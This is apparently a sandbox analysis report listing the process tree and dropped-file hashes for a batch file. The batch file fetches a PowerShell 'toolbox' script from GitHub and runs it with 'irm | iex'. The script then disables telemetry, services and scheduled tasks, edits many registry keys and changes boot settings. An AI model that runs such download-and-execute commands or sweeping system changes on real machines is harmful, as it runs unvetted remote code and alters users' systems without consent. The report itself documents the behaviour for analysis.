C:\Windows\System32\find.exefind /i "Office 16"7⤵PID:4048
-
-
C:\Windows\System32\find.exefind /i "R_Retail" "C:\Windows\Temp\sppchk.txt"7⤵PID:4676
-
-
C:\Windows\System32\find.exefind /i "Office 15"7⤵PID:880
-
-
C:\Windows\System32\Wbem\WMIC.exewmic path SoftwareLicensingProduct where (ApplicationID='0ff1ce15-a989-479d-af46-f275c6370663' AND LicenseFamily like 'Office16O365%' ) get LicenseFamily /value7⤵PID:2688
-
-
C:\Windows\System32\find.exefind /i "O365"7⤵PID:1760
-
-
-
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\test.bat" "1⤵PID:716
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "irm github.com/SteavenToolBox/Windows/raw/main/SteavenToolBox.ps1 | iex2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
PID:4544 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" C:\windows\temp\SteavenToolBox.cmd3⤵
- Suspicious behavior: EnumeratesProcesses
PID:1756 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\windows\temp\SteavenToolBox.cmd""4⤵PID:2380
-
C:\Windows\system32\reg.exeReg.exe query "HKU\S-1-5-19\Environment"5⤵PID:2216
-
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "VerboseStatus" /t REG_DWORD /d "1" /f5⤵PID:2384
-
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SYSTEM\CurrentControlSet\Control\Power\PowerThrottling" /v "PowerThrottlingOff" /t REG_DWORD /d "0" /f5⤵PID:1116
-
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SYSTEM\Maps" /v "AutoUpdateEnabled" /t REG_DWORD /d "0" /f5⤵PID:2920
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "Get-AppxPackage *WindowsMaps* | Remove-AppxPackage"5⤵
- Suspicious behavior: EnumeratesProcesses
PID:332
-
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SYSTEM\Maps" /v "AutoUpdateEnabled" /t REG_DWORD /d "1" /f5⤵PID:4336
-
-
C:\Windows\system32\reg.exeReg.exe add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v "EnableAutoTray" /t REG_DWORD /d "1" /f5⤵PID:3600
-
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SYSTEM\CurrentControlSet\Control\Power\PowerThrottling" /v "PowerThrottlingOff" /t REG_DWORD /d "1" /f5⤵PID:4432
-
-
C:\Windows\system32\reg.exeReg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "TaskbarMn" /t REG_DWORD /d "0" /f5⤵PID:3952
-
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\DataCollection" /v "AllowTelemetry" /t REG_DWORD /d "0" /f5⤵PID:1556
-
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\DataCollection" /v "DoNotShowFeedbackNotifications" /t REG_DWORD /d "0" /f5⤵PID:1412
-
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\DataCollection" /v "AllowTelemetry" /t REG_DWORD /d "0" /f5⤵PID:4288
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Application Experience\Microsoft Compatibility Appraiser" /Disable5⤵PID:4956
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Application Experience\ProgramDataUpdater" /Disable5⤵PID:4376
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Autochk\Proxy" /Disable5⤵PID:1080
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Customer Experience Improvement Program\Consolidator" /Disable5⤵PID:4724
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Customer Experience Improvement Program\UsbCeip" /Disable5⤵PID:3524
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\DiskDiagnostic\Microsoft-Windows-DiskDiagnosticDataCollector" /Disable5⤵PID:1856
-
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\Microsoft\PolicyManager\default\Wifi\AllowAutoConnectToWiFiSenseHotspots" /v "value" /t REG_DWORD /d "0" /f5⤵PID:2488
-
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\Microsoft\PolicyManager\default\Wifi\AllowWiFiHotSpotReporting" /v "Value" /t REG_DWORD /d "0" /f5⤵PID:180
-
-
C:\Windows\system32\reg.exeReg.exe add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\ContentDeliveryManager" /v "ContentDeliveryAllowed" /t REG_DWORD /d "0" /f5⤵PID:1936
-
-
C:\Windows\system32\reg.exeReg.exe add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\ContentDeliveryManager" /v "OemPreInstalledAppsEnabled" /t REG_DWORD /d "0" /f5⤵PID:1396
-
-
C:\Windows\system32\reg.exeReg.exe add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\ContentDeliveryManager" /v "PreInstalledAppsEnabled" /t REG_DWORD /d "0" /f5⤵PID:2696
-
-
C:\Windows\system32\reg.exeReg.exe add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\ContentDeliveryManager" /v "PreInstalledAppsEverEnabled" /t REG_DWORD /d "0" /f5⤵PID:4460
-
-
C:\Windows\system32\reg.exeReg.exe add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\ContentDeliveryManager" /v "SilentInstalledAppsEnabled" /t REG_DWORD /d "0" /f5⤵PID:5096
-
-
C:\Windows\system32\reg.exeReg.exe add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\ContentDeliveryManager" /v "SubscribedContent-338387Enabled" /t REG_DWORD /d "0" /f5⤵PID:3048
-
-
C:\Windows\system32\reg.exeReg.exe add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\ContentDeliveryManager" /v "SubscribedContent-338388Enabled" /t REG_DWORD /d "0" /f5⤵PID:508
-
-
C:\Windows\system32\reg.exeReg.exe add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\ContentDeliveryManager" /v "SubscribedContent-338389Enabled" /t REG_DWORD /d "0" /f5⤵PID:1784
-
-
C:\Windows\system32\reg.exeReg.exe add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\ContentDeliveryManager" /v "SubscribedContent-353698Enabled" /t REG_DWORD /d "0" /f5⤵PID:4624
-
-
C:\Windows\system32\reg.exeReg.exe add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\ContentDeliveryManager" /v "SubscribedContent-338393Enabled" /t REG_DWORD /d "0" /f5⤵PID:3344
-
-
C:\Windows\system32\reg.exeReg.exe add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\ContentDeliveryManager" /v "SubscribedContent-353694Enabled" /t REG_DWORD /d "0" /f5⤵PID:3736
-
-
C:\Windows\system32\reg.exeReg.exe add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\ContentDeliveryManager" /v "SubscribedContent-353696Enabled" /t REG_DWORD /d "0" /f5⤵PID:2560
-
-
C:\Windows\system32\reg.exeReg.exe add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\ContentDeliveryManager" /v "SystemPaneSuggestionsEnabled" /t REG_DWORD /d "0" /f5⤵PID:3296
-
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\SOFTWARE\Policies\Microsoft\Windows\CloudContent" /v "DisableWindowsConsumerFeatures" /t REG_DWORD /d "1" /f5⤵PID:4916
-
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v "EnableActivityFeed" /t REG_DWORD /d "0" /f5⤵PID:4268
-
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v "PublishUserActivities" /t REG_DWORD /d "0" /f5⤵PID:2404
-
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v "UploadUserActivities" /t REG_DWORD /d "0" /f5⤵PID:2792
-
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\ConsentStore\location" /v "Value" /t REG_SZ /d "Deny" /f5⤵PID:2376
-
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Sensor\Overrides\{BFA794E4-F964-4FDB-90F6-51056BFE4B44}" /v "SensorPermissionState" /t REG_DWORD /d "0" /f5⤵PID:2332
-
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\lfsvc\Service\Configuration" /v "Status" /t REG_DWORD /d "0" /f5⤵PID:2852
-
-
C:\Windows\system32\reg.exeReg.exe add "HKCU\SOFTWARE\Microsoft\Siuf\Rules" /v "NumberOfSIUFInPeriod" /t REG_DWORD /d "0" /f5⤵PID:1924
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Feedback\Siuf\DmClient" /Disable5⤵PID:4572
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Feedback\Siuf\DmClientOnScenarioDownload" /Disable5⤵PID:1128
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "Get-AppxPackage *WindowsFeedbackHub* | Remove-AppxPackage"5⤵
- Suspicious behavior: EnumeratesProcesses
PID:3764
-
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\AdvertisingInfo" /v "DisabledByGroupPolicy" /t REG_DWORD /d "1" /f5⤵PID:4724
-
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\Microsoft\Windows\Windows Error Reporting" /v "Disabled" /t REG_DWORD /d "1" /f5⤵PID:1856
-
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Config" /v "DODownloadMode" /t REG_DWORD /d "1" /f5⤵PID:2488
-
-
C:\Windows\system32\sc.exesc stop DiagTrack5⤵
- Launches sc.exe
PID:180
-
-
C:\Windows\system32\sc.exesc stop dmwappushservice5⤵
- Launches sc.exe
PID:4812
-
-
C:\Windows\system32\sc.exesc config "DiagTrack" start=disabled5⤵
- Launches sc.exe
PID:1948
-
-
C:\Windows\system32\bcdedit.exebcdedit /set {current} bootmenupolicy Legacy5⤵
- Modifies boot configuration data using bcdedit
PID:4836
-
-
C:\Windows\system32\sc.exesc config "dmwappushservice" start=disabled5⤵
- Launches sc.exe
PID:2092
-
-
C:\Windows\system32\sc.exesc stop HomeGroupListener5⤵
- Launches sc.exe
PID:696
-
-
C:\Windows\system32\sc.exesc config "HomeGroupListener" start=disabled5⤵
- Launches sc.exe
PID:3904
-
-
C:\Windows\system32\sc.exesc stop HomeGroupProvider5⤵
- Launches sc.exe
PID:3048
-
-
C:\Windows\system32\sc.exesc config "HomeGroupProvider" start=disabled5⤵
- Launches sc.exe
PID:508
-
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SYSTEM\CurrentControlSet\Control\Remote Assistance" /v "fAllowToGetHelp" /t REG_DWORD /d "0" /f5⤵PID:4556
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "Remove-Item -Path "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\StorageSense\Parameters\StoragePolicy" -Recurse -ErrorAction SilentlyContinue"5⤵
- Suspicious behavior: EnumeratesProcesses
PID:1664
-
-
C:\Windows\system32\sc.exesc stop SysMain5⤵
- Launches sc.exe
PID:2640
-
-
C:\Windows\system32\sc.exesc config "SysMain" start=disabled5⤵
- Launches sc.exe
PID:2792
-
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Power" /v "HibernteEnabled" /t REG_DWORD /d "0" /f5⤵PID:3460
-
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FlyoutMenuSettings" /v "ShowHibernateOption" /t REG_DWORD /d "0" /f5⤵PID:2376
-
-
C:\Windows\system32\reg.exeReg.exe add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\OperationStatusManager" /v "EnthusiastMode" /t REG_DWORD /d "1" /f5⤵PID:4076
-
-
C:\Windows\system32\reg.exeReg.exe add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "ShowCortanaButton" /t REG_DWORD /d "0" /f5⤵PID:4864
-
-
C:\Windows\system32\reg.exeReg.exe add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "ShowTaskViewButton" /t REG_DWORD /d "0" /f5⤵PID:3600
-
-
C:\Windows\system32\reg.exeReg.exe add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\People" /v "PeopleBand" /t REG_DWORD /d "0" /f5⤵PID:4512
-
-
C:\Windows\system32\reg.exeReg.exe add "HKU\.DEFAULT\Control Panel\Keyboard" /v "InitialKeyboardIndicators" /t REG_DWORD /d "558319670" /f5⤵
- Modifies data under HKEY_USERS
PID:2796
-
-
C:\Windows\system32\reg.exeReg.exe add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v "EnableAutoTray" /t REG_DWORD /d "1" /f5⤵PID:1128
-
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SYSTEM\GameConfigStore" /v "GameDVR_DXGIHonorFSEWindowsCompatible" /t REG_DWORD /d "0" /f5⤵PID:3772
-
-
C:\Windows\system32\reg.exeReg.exe add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "LaunchTo" /t REG_DWORD /d "1" /f5⤵PID:2408
-
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SYSTEM\GameConfigStore" /v "GameDVR_HonorUserFSEBehaviorMode" /t REG_DWORD /d "0" /f5⤵PID:2836
-
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SYSTEM\GameConfigStore" /v "GameDVR_EFSEFeatureFlags" /t REG_DWORD /d "0" /f5⤵PID:1556
-
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SYSTEM\GameConfigStore" /v "GameDVR_Enabled" /t REG_DWORD /d "0" /f5⤵PID:4364
-
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\DriverSearching" /v "SearchOrderConfig" /t REG_DWORD /d "0" /f5⤵PID:3316
-
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Multimedia\SystemProfile" /v "NetworkThrottlingIndex" /t REG_DWORD /d "10" /f5⤵PID:2020
-
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Multimedia\SystemProfile" /v "SystemResponsiveness" /t REG_DWORD /d "20" /f5⤵PID:3764
-
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SYSTEM\CurrentControlSet\Control" /v "WaitToKillServiceTimeout" /t REG_DWORD /d "2000" /f5⤵PID:4956
-
-
C:\Windows\system32\reg.exeReg.exe add "HKCU\Control Panel\Desktop" /v "AutoEndTasks" /t REG_SZ /d "1" /f5⤵PID:4372
-
-
C:\Windows\system32\reg.exeReg.exe add "HKCU\Control Panel\Desktop" /v "HungAppTimeout" /t REG_SZ /d "1000" /f5⤵PID:4536
-
-
C:\Windows\system32\reg.exeReg.exe add "HKCU\Control Panel\Desktop" /v "MenuShowDelay" /t REG_SZ /d "8" /f5⤵PID:2868
-
-
C:\Windows\system32\reg.exeReg.exe add "HKCU\Control Panel\Desktop" /v "WaitToKillAppTimeout" /t REG_SZ /d "2000" /f5⤵PID:1948
-
-
C:\Windows\system32\reg.exeReg.exe add "HKCU\Control Panel\Desktop" /v "LowLevelHooksTimeout" /t REG_SZ /d "1000" /f5⤵PID:2696
-
-
C:\Windows\system32\reg.exeReg.exe add "HKCU\Control Panel\Mouse" /v "MouseHoverTime" /t REG_SZ /d "8" /f5⤵PID:116
-
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SYSTEM\CurrentControlSet\Control" /v "WaitToKillServiceTimeout" /t REG_SZ /d "2000" /f5⤵PID:5096
-
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\test.bat" "1⤵PID:2624
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "irm github.com/SteavenToolBox/Windows/raw/main/SteavenToolBox.ps1 | iex2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
PID:3180 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" C:\windows\temp\SteavenToolBox.cmd3⤵
- Suspicious behavior: EnumeratesProcesses
PID:1388 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\windows\temp\SteavenToolBox.cmd""4⤵PID:1792
-
C:\Windows\system32\reg.exeReg.exe query "HKU\S-1-5-19\Environment"5⤵PID:4116
-
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "VerboseStatus" /t REG_DWORD /d "1" /f5⤵PID:3784
-
-
-
-
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Suspicious use of SetWindowsHookEx
PID:2600
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 196 -p 1856 -ip 18561⤵PID:2836
-
C:\Windows\system32\msinfo32.exe"C:\Windows\system32\msinfo32.exe"1⤵
- Checks SCSI registry key(s)
- Enumerates system info in registry
- Suspicious behavior: GetForegroundWindowSpam
PID:1928
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
955B
MD5d7b515ba435019604522d1283122e703
SHA1843d4e5d5b822b7ea9936d1808736fb1f44708b9
SHA2563f3e5aa495b9bd3cbf6a62656a0030d7235ec93451200e46224ee709b9a69072
SHA51249a2477d6564ea62711fa5a1197be016edebefa2f039e37693697323595f974c298b9d666bd05e333828d99a6bc56f8d139178c27c2247b0feeeeea0ad27eacc
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
944B
MD5b086349decfa4dbf44326ac3c87fb729
SHA1ab08e17c4500529609cac755a3c2146345cdceb0
SHA256657d26fd12db349535c84653cacbef9c4259daa1d0bc68def09e3a145b7e6af6
SHA512d85e664c9e516dffd910d941023d65f5506f273aecb6a697589c1ffcfcc14f99cbb567a0be8a9fb8aa1166125a374d1a299d65f7b2c1f717761c740e3a5b14fa
-
Filesize
554KB
MD5a7927846f2bd5e6ab6159fbe762990b1
SHA18e3b40c0783cc88765bbc02ccc781960e4592f3f
SHA256913f97dd219eeb7d5f7534361037fe1ecc3a637eb48d67b1c8afa8b5f951ba2f
SHA5121eafece2f6aa881193e6374b81d7a7c8555346756ed53b11ca1678f1f3ffb70ae3dea0a30c5a0aab8be45db9c31d78f30f026bb22a7519a0930483d50507243f
-
Filesize
112KB
MD594dc379aa020d365ea5a32c4fab7f6a3
SHA17270573fd7df3f3c996a772f85915e5982ad30a1
SHA256dc6a5930c2b9a11204d2e22a3e8d14c28e5bdac548548e256ba7ffa79bd8c907
SHA512998fd10a1f43024a2398491e3764748c0b990b37d8b3c820d281296f8da8f1a2f97073f4fd83543994a6e326fa7e299cb5f59e609358cd77af996175782eeaca
-
Filesize
875KB
MD56ad0376a375e747e66f29fb7877da7d0
SHA1a0de5966453ff2c899f00f165bbff50214b5ea39
SHA2564c9a4ab6596626482dd2190034fcb3fafebe88a961423962ad577e873ef5008f
SHA5128a97b2cc96ec975188e53e428d0fc2c562f4c3493d3c354e316c7f89a0bd25c84246807c9977f0afdda3291b8c23d518a36fd967d8f9d4d2ce7b0af11b96eb18
-
Filesize
875KB
MD56ad0376a375e747e66f29fb7877da7d0
SHA1a0de5966453ff2c899f00f165bbff50214b5ea39
SHA2564c9a4ab6596626482dd2190034fcb3fafebe88a961423962ad577e873ef5008f
SHA5128a97b2cc96ec975188e53e428d0fc2c562f4c3493d3c354e316c7f89a0bd25c84246807c9977f0afdda3291b8c23d518a36fd967d8f9d4d2ce7b0af11b96eb18
-
Filesize
402KB
MD5b1f793773dc727b4af1648d6d61f5602
SHA1be7ed4e121c39989f2fb343558171ef8b5f7af68
SHA256af7f342adf5b533ea6978b68064f39bfb1e4ad3b572ae1b7f2287f5533334d4e
SHA51266a92bff5869a56a7931d7ed9881d79c22ba741c55fb42c11364f037e1ec99902db2679b67a7e60cbf760740d5b47dcf1a6dcfae5ad6711a0bd7f086cc054eed
-
Filesize
183KB
MD5a033f16836d6f8acbe3b27b614b51453
SHA1716297072897aea3ec985640793d2cdcbf996cf9
SHA256e3b3a4c9c6403cb8b0aa12d34915b67e4eaa5bb911e102cf77033aa315d66a1e
SHA512ad5b641d93ad35b3c7a3b56cdf576750d1ad4c63e2a16006739888f0702280cad57dd0a6553ef426111c04ceafd6d1e87f6e7486a171fff77f243311aee83871
-
Filesize
183KB
MD5a033f16836d6f8acbe3b27b614b51453
SHA1716297072897aea3ec985640793d2cdcbf996cf9
SHA256e3b3a4c9c6403cb8b0aa12d34915b67e4eaa5bb911e102cf77033aa315d66a1e
SHA512ad5b641d93ad35b3c7a3b56cdf576750d1ad4c63e2a16006739888f0702280cad57dd0a6553ef426111c04ceafd6d1e87f6e7486a171fff77f243311aee83871
-
Filesize
142KB
MD5e5d5e9c1f65b8ec7aa5b7f1b1acdd731
SHA1dbb14dcda6502ab1d23a7c77d405dafbcbeb439e
SHA256e30508e2088bc16b2a84233ced64995f738deaef2366ac6c86b35c93bbcd9d80
SHA5127cf80d4a16c5dbbf61fcb22ebe30cf78ca42a030b7d7b4ad017f28fba2c9b111e8cf5b3064621453a44869bbaed124d6fb1e8d2c8fe8202f1e47579d874fa4bc
-
Filesize
255KB
MD5490be3119ea17fa29329e77b7e416e80
SHA1c71191c3415c98b7d9c9bbcf1005ce6a813221da
SHA256ef1e263e1bcc05d9538cb9469dd7dba5093956aa325479c3d2607168cc1c000a
SHA5126339b030008b7d009d36abf0f9595da9b793264ebdce156d4a330d095a5d7602ba074075ea05fef3dde474fc1d8e778480429de308c121df0bf3075177f26f13
-
Filesize
415KB
MD5ea8488990b95ce4ef6b4e210e0d963b2
SHA1cd8bf723aa9690b8ca9a0215321e8148626a27d1
SHA25604f851b9d5e58ed002ad768bdcc475f22905fb1dab8341e9b3128df6eaa25b98
SHA51256562131cbe5f0ea5a2508f5bfed88f21413526f1539fe4864ece5b0e03a18513f3db33c07e7abd7b8aaffc34a7587952b96bb9990d9f4efa886f613d95a5b1b
-
Filesize
619KB
MD5df785c5e4aacaee3bd16642d91492815
SHA1286330d2ab07512e1f636b90613afcd6529ada1e
SHA25656cc8d139be12e969fff3bbf47b1f5c62c3db887e3fb97c79cf7d285076f9271
SHA5123566de60fe76b63940cff3579da94f404c0bc713f2476ba00b9de12dc47973c7c22d5eed1fd667d20cea29b3c3c4fa648e5f44667e8369c192a4b69046e6f745
-
Filesize
59KB
MD54f3250ecb7a170a5eb18295aa768702d
SHA170eb14976ddab023f85bc778621ade1d4b5f4d9d
SHA256a235317ab7ed89e6530844a78b933d50f6f48ea5df481de158eb99dd8c4ba461
SHA512e9ce6cced5029d931d82e78e7e609a892bfe239096b55062b78e8ff38cce34ce6dd4e91efb41c4cd6ecf6017d098e4c9b13d6cb4408d761051468ee7f74bc569
-
Filesize
149KB
MD5ef7e2760c0a24453fc78359aea3d7869
SHA10ea67f1fd29df2615da43e023e86046e8e46e2e1
SHA256d39f38402a9309ddd1cba67be470ede348f2bc1bab2f8d565e8f15510761087a
SHA512be785ba6b564cc4e755b4044ae27f916c009b7d942fcd092aed2ae630b1704e8a2f8b4692648eed481a5eb5355fd2e1ef7f94f6fb519b7e1ff6fc3c5f1aaa06f
-
Filesize
59KB
MD5120f0a2022f423fc9aadb630250f52c4
SHA1826df2b752c4f1bba60a77e2b2cf908dd01d3cf7
SHA2565425382aaa32ffc133adb6458ff516db0e2ad60fac52dd595d53c370f4ba6fa0
SHA51223e50735c06cef93d11873fc8e5e29fc63dcf3f01dc56822a17c11ca57bbfb10d46fac6351f84ba30050a16d6bd0744a08a4042a9743a6df87ac8a12e81e2764
-
Filesize
59KB
MD5120f0a2022f423fc9aadb630250f52c4
SHA1826df2b752c4f1bba60a77e2b2cf908dd01d3cf7
SHA2565425382aaa32ffc133adb6458ff516db0e2ad60fac52dd595d53c370f4ba6fa0
SHA51223e50735c06cef93d11873fc8e5e29fc63dcf3f01dc56822a17c11ca57bbfb10d46fac6351f84ba30050a16d6bd0744a08a4042a9743a6df87ac8a12e81e2764
-
Filesize
218KB
MD535e989a1df828378baa340f4e0b2dfcb
SHA159ecc73a0b3f55e43dace3b05ff339f24ec2c406
SHA256874137ee906f91285b9a018735683a0dd21bdeaf2e340cbc54296551ccf8be2d
SHA512c8d69e37c918881786a8fdab2a2c5d1632411b1f75082aeb3eb24a8ba5f93dcb39b3f4000e651f95452263525d98fd1d3cb834de93bed16fa6f92ef271c3a92a
-
Filesize
296KB
MD5510e132215cef8d09be40402f355879b
SHA1cae8659f2d3fd54eb321a8f690267ba93d56c6f1
SHA2561bb39f3389aa4258a923fa265afa2279688e6cdb14ff771f1621a56b03ddcf52
SHA5122f7b2ec0e94738838f755759cd35e20ab2138b8eca023ee6ef630ab83a3de1bc0792f12ea0d722abe9a6953626cbddf8ba55ea32fc794d2df677a0625e498ab0
-
Filesize
296KB
MD5510e132215cef8d09be40402f355879b
SHA1cae8659f2d3fd54eb321a8f690267ba93d56c6f1
SHA2561bb39f3389aa4258a923fa265afa2279688e6cdb14ff771f1621a56b03ddcf52
SHA5122f7b2ec0e94738838f755759cd35e20ab2138b8eca023ee6ef630ab83a3de1bc0792f12ea0d722abe9a6953626cbddf8ba55ea32fc794d2df677a0625e498ab0
-
Filesize
77KB
MD5815a4e7a7342224a239232f2c788d7c0
SHA1430b7526d864cfbd727b75738197230d148de21a
SHA256a9c8787c79a952779eca82e7389cf5bbde7556e4491b8bfcfd6617740ac7d8a2
SHA5120c19d1e388ed0855a660135dec7a5e6b72ecbb7eb67ff94000f2399bd07df431be538055a61cfb2937319a0ce060898bb9b6996765117b5acda8fc0bad47a349
-
Filesize
77KB
MD5815a4e7a7342224a239232f2c788d7c0
SHA1430b7526d864cfbd727b75738197230d148de21a
SHA256a9c8787c79a952779eca82e7389cf5bbde7556e4491b8bfcfd6617740ac7d8a2
SHA5120c19d1e388ed0855a660135dec7a5e6b72ecbb7eb67ff94000f2399bd07df431be538055a61cfb2937319a0ce060898bb9b6996765117b5acda8fc0bad47a349
-
Filesize
207KB
MD59a760ddc9fdca758501faf7e6d9ec368
SHA15d395ad119ceb41b776690f9085f508eaaddb263
SHA2567ff3939e1ef015da8c9577af4edfdd46f0029a2cfe4e3dac574d3175516e095f
SHA51259d095246b62a7777e7d2d50c2474f4b633a1ae96056e4a4cb5265ccf7432fed0ea5df9b350f44d70b55a726241da10f228d8b5cbee9b0890c0b9dc9e810b139
-
Filesize
207KB
MD59a760ddc9fdca758501faf7e6d9ec368
SHA15d395ad119ceb41b776690f9085f508eaaddb263
SHA2567ff3939e1ef015da8c9577af4edfdd46f0029a2cfe4e3dac574d3175516e095f
SHA51259d095246b62a7777e7d2d50c2474f4b633a1ae96056e4a4cb5265ccf7432fed0ea5df9b350f44d70b55a726241da10f228d8b5cbee9b0890c0b9dc9e810b139
-
Filesize
149KB
MD5db4c3a07a1d3a45af53a4cf44ed550ad
SHA15dea737faadf0422c94f8f50e9588033d53d13b3
SHA2562165d567aa47264abe2a866bb1bcb01a1455a75a6ea530b1b9a4dda54d08f758
SHA5125182b80459447f3c1fb63b70ad0370e1da26828a7f73083bec0af875b37888dd12ec5a6d9dc84157fc5b535f473ad7019eb6a53b9a47a2e64e6a8b7fae4cddde
-
Filesize
149KB
MD5db4c3a07a1d3a45af53a4cf44ed550ad
SHA15dea737faadf0422c94f8f50e9588033d53d13b3
SHA2562165d567aa47264abe2a866bb1bcb01a1455a75a6ea530b1b9a4dda54d08f758
SHA5125182b80459447f3c1fb63b70ad0370e1da26828a7f73083bec0af875b37888dd12ec5a6d9dc84157fc5b535f473ad7019eb6a53b9a47a2e64e6a8b7fae4cddde
-
Filesize
182KB
MD59cd7292cca75d278387d2bdfb940003c
SHA1bab579889ed3ac9cb0f124842c3e495cb2ec92ac
SHA256b38d322af8e614cc54299effd2164247c75bd7e68e0eb1a428376fcedaca9a6f
